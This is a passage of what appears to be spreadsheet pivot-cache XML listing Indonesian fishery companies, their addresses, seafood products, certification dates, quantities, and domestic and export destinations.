    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22676"/>
    <x v="732"/>
    <s v="PT. WILMAX BRILIAN PERKASA"/>
    <s v="Jl. Marsekal Surya Dharma Pergudangan Bandara Mas Blok A9, Kel. Selapang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22677"/>
    <x v="732"/>
    <s v="PT. WILMAX BRILIAN PERKASA"/>
    <s v="Jl. Marsekal Surya Dharma Pergudangan Bandara Mas Blok A9, Kel. Selapang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="48000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22678"/>
    <x v="733"/>
    <s v="PT. ASNUR ANTON JAYA"/>
    <s v="Jl. Tol Lama Pergudangan Karunia Sulawesi Blok G No.11, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Chile, China, Denmark, Korea, Democratic People's Republic of, Philippines, Spain"/>
  </r>
  <r>
    <n v="22683"/>
    <x v="734"/>
    <s v="PT. CDF INDONESIA"/>
    <s v="Dusun Kampungbaru RT 04 RT 03, Kel. Grajagan, Kec. Purwoharjo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kayu"/>
    <d v="2020-12-18T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22684"/>
    <x v="735"/>
    <s v="PT. NUANSA ALAM ABADI"/>
    <s v="Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Scallop Segar"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22685"/>
    <x v="735"/>
    <s v="PT. NUANSA ALAM ABADI"/>
    <s v="Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Fillet Kod Beku"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22686"/>
    <x v="735"/>
    <s v="PT. NUANSA ALAM ABADI"/>
    <s v="Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Kod)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22687"/>
    <x v="736"/>
    <s v="PT. MALUKU PRIMA MAKMUR"/>
    <s v="Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22688"/>
    <x v="736"/>
    <s v="PT. MALUKU PRIMA MAKMUR"/>
    <s v="Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22690"/>
    <x v="736"/>
    <s v="PT. MALUKU PRIMA MAKMUR"/>
    <s v="Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22691"/>
    <x v="736"/>
    <s v="PT. MALUKU PRIMA MAKMUR"/>
    <s v="Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Cakalang)"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22693"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Hidup (Kuwe, Kerapu, Kakatua)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22696"/>
    <x v="737"/>
    <s v="PT. MINA JAYA LESTARI"/>
    <s v="Jl. Trans Manado-Bitung, Desa Kauditan II Jaga XIII, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Malalugis, Cakalang)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1788"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22697"/>
    <x v="165"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Kampung Adiwarna, Kel. Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulangbawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Bernilai Tambah Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="390000"/>
    <m/>
    <s v="Germany, Japan, Philippines, United Kingdom"/>
  </r>
  <r>
    <n v="22698"/>
    <x v="165"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Kampung Adiwarna, Kel. Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulangbawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Bernilai Tambah Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="Italy, Philippines"/>
  </r>
  <r>
    <n v="22699"/>
    <x v="738"/>
    <s v="PT, BALI TUNA SEGAR"/>
    <s v="Jl, Ikan Tuna Raya No,17 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="33997"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22700"/>
    <x v="738"/>
    <s v="PT, BALI TUNA SEGAR"/>
    <s v="Jl, Ikan Tuna Raya No,17 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="181443"/>
    <s v="Kabupaten Cilacap, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="22701"/>
    <x v="738"/>
    <s v="PT, BALI TUNA SEGAR"/>
    <s v="Jl, Ikan Tuna Raya No,17 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="4432"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22702"/>
    <x v="738"/>
    <s v="PT. BALI TUNA SEGAR"/>
    <s v="Jl. Ikan Tuna Raya No.17 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22709"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22710"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Lemadang, Selar, Cakalang, Tenggiri)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22711"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22712"/>
    <x v="72"/>
    <s v="PT. SUMBERLAUT BENGINDO"/>
    <s v="Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22715"/>
    <x v="586"/>
    <s v="CV. ADI JAYA MANDIRI"/>
    <s v="Blok. Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bandeng Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="125000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kota Bandung, Kota Cimahi, Kabupaten Rembang, Kabupaten Pati, Kabupaten Brebes, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="22716"/>
    <x v="536"/>
    <s v="PT. WAHYU PRADANA BINAMULIA"/>
    <s v="Jl. Kima 10 Blok T No.2B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Lobster Beku"/>
    <d v="2020-10-23T00:00:00"/>
    <n v="1500"/>
    <m/>
    <s v="American Samoa, Japan, Russian Federation"/>
  </r>
  <r>
    <n v="22717"/>
    <x v="739"/>
    <s v="CV, HDT PONDO PRODUK"/>
    <s v="Desa Karangmanggis RT 01 RW 01, Kec, Boja, Kabupaten Kendal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cangkang Rajungan"/>
    <d v="2020-10-26T00:00:00"/>
    <n v="37950"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22718"/>
    <x v="739"/>
    <s v="CV, HDT PONDO PRODUK"/>
    <s v="Desa Karangmanggis RT 01 RW 01, Kec, Boja, Kabupaten Kendal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tepung Ikan"/>
    <d v="2020-10-26T00:00:00"/>
    <n v="2145"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22721"/>
    <x v="740"/>
    <s v="PRAMESTI MALIMA ENERGI FOKUS SEJAHTERA (PMEFS)"/>
    <s v="Jl, Merak No,04 RT 001 RW 023, Kel, Palangka, Kec, Jekan Raya, Kota Palangka Raya&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Abon Ikan, Abon Rendang Ikan, Abon Kandas Sarai Ikan "/>
    <d v="2020-11-13T00:00:00"/>
    <s v="28/01/1900  13,44,00"/>
    <s v="Kota Medan, Kota Padang, Kota Pekanbaru, Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Cimahi, Kabupaten Kudus, Kota Magelang, Kota Surakarta, Kota Yogyakarta, Kabupaten Jember, Kabupaten Banyuwangi, Kota Malang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah, Kabupaten Lombok Timur, Kabupaten Lombok Utara, Kabupaten Kapuas Hulu, Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota Banjarmasin, Kota Banjar Baru, Kabupaten Kutai Barat, Kabupaten Kutai Kartanegara, Kabupaten Kutai Timur, Kota Balikpapan"/>
    <m/>
  </r>
  <r>
    <n v="22722"/>
    <x v="740"/>
    <s v="PRAMESTI MALIMA ENERGI FOKUS SEJAHTERA (PMEFS)"/>
    <s v="Jl. Merak No.04 RT 001 RW 023, Kel. Palangka, Kec. Jekan Raya, Kota Palangka Raya&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Ikan Mix Sayuran, Naget Ikan) "/>
    <d v="2020-11-13T00:00:00"/>
    <n v="240"/>
    <s v="Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota Banjarmasin, Kota Banjar Baru, Kabupaten Kutai Kartanegara, Kota Balikpapan, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="22724"/>
    <x v="740"/>
    <s v="PRAMESTI MALIMA ENERGI FOKUS SEJAHTERA (PMEFS)"/>
    <s v="Jl. Merak No.04 RT 001 RW 023, Kel. Palangka, Kec. Jekan Raya, Kota Palangka Raya&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Pempek Ikan"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="288"/>
    <s v="Kota Pontianak, Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kabupaten Kapuas, Kabupaten Barito Selatan, Kabupaten Barito Utara, Kabupaten Seruyan, Kabupaten Katingan, Kabupaten Pulang Pisau, Kabupaten Gunung Mas, Kabupaten Barito Timur, Kabupaten Murung Raya, Kota Palangka Raya, Kabupaten Barito Kuala, Kabupaten Hulu Sungai Selatan, Kabupaten Hulu Sungai Tengah, Kabupaten Hulu Sungai Utara, Kota Banjarmasin, Kota Banjar Baru, Kota Balikpapan, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="22728"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-11-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="22730"/>
    <x v="703"/>
    <s v="CV. SOON HO TBA"/>
    <s v="Jl. Tanjung Berombang, Dusun V, Kel. Asahan Mati, Kec. Tanjungbalai, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Fermentasi"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22738"/>
    <x v="741"/>
    <s v="PT, HASIL MELIMPAH"/>
    <s v="Jl, Tuna III No,5 Area Parkir Muara Baru Center, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Layur, Kakap Merah, Baronang)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22739"/>
    <x v="741"/>
    <s v="PT, HASIL MELIMPAH"/>
    <s v="Jl, Tuna III No,5 Area Parkir Muara Baru Center, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="6000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Cilacap, Kabupaten Banyuwangi, Kota Surabaya"/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="22740"/>
    <x v="741"/>
    <s v="PT, HASIL MELIMPAH"/>
    <s v="Jl, Tuna III No,5 Area Parkir Muara Baru Center, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Lemadang, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="7000000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cilacap, Kabupaten Banyuwangi, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22741"/>
    <x v="741"/>
    <s v="PT, HASIL MELIMPAH"/>
    <s v="Jl, Tuna III No,5 Area Parkir Muara Baru Center, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22746"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="408000"/>
    <s v="Kota Denpasar"/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22747"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Semar, Gindara, Tenggiri, Todak)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Denpasar"/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22748"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22749"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Barramundi, Kakatua, Bawal, Kakap, Kerapu, Ekor Kuning)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Denpasar"/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22751"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Barramundi, Kakatua, Bawal, Kakap, Kerapu, Ekor Kuning)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22756"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="30"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22757"/>
    <x v="742"/>
    <s v="PT. HATINDO MAKMUR"/>
    <s v="Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="100"/>
    <s v="Kota Denpasar"/>
    <s v="China, France, Greece, Japan, Korea, Democratic People's Republic of, Malaysia, Portugal, Russian Federation, Singapore, Taiwan, Province of China, Thailand, Ukraine, United States"/>
  </r>
  <r>
    <n v="22758"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-02-19T00:00:00"/>
    <n v="30"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22759"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Terbang, Tenggiri)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22760"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22762"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kod, Katamba, Sebelah, Kerapu, Kakatua, Kakap, Kaci-kaci, Guntur, Kurisi, Barramundi)"/>
    <d v="2021-02-19T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22763"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Terbang, Tenggiri)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="22764"/>
    <x v="743"/>
    <s v="PT. ADIB GLOBAL FOOD SUPPLIES"/>
    <s v="Balai Layanan Usaha Produksi Perikanan Budidaya (BLUPPB) Karawang, Kel. Pusakajaya Utara, Kec. Cilebar, Kabupaten Karawang&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Mujair, Patin, Nila)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bekasi"/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="22765"/>
    <x v="744"/>
    <s v="PT, JEMBATAN LINTAS GLOBAL"/>
    <s v="Jl, Hatni No,200A Km 60,8, Kel, Tlogosadang, Kec, Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Barakuda, Bonito, Escolar, Kembung, Lemadang, Layaran, Cakalang, Tenggiri)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22766"/>
    <x v="744"/>
    <s v="PT, JEMBATAN LINTAS GLOBAL"/>
    <s v="Jl, Hatni No,200A Km 60,8, Kel, Tlogosadang, Kec, Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Pisang-pisang, Biji Nangka, Kerapu, Layur, Halibut, Beloso, Kakatua, Kakap, Kaci-kaci, Kuro, Barramundi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22767"/>
    <x v="744"/>
    <s v="PT, JEMBATAN LINTAS GLOBAL"/>
    <s v="Jl, Hatni No,200A Km 60,8, Kel, Tlogosadang, Kec, Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22768"/>
    <x v="744"/>
    <s v="PT, JEMBATAN LINTAS GLOBAL"/>
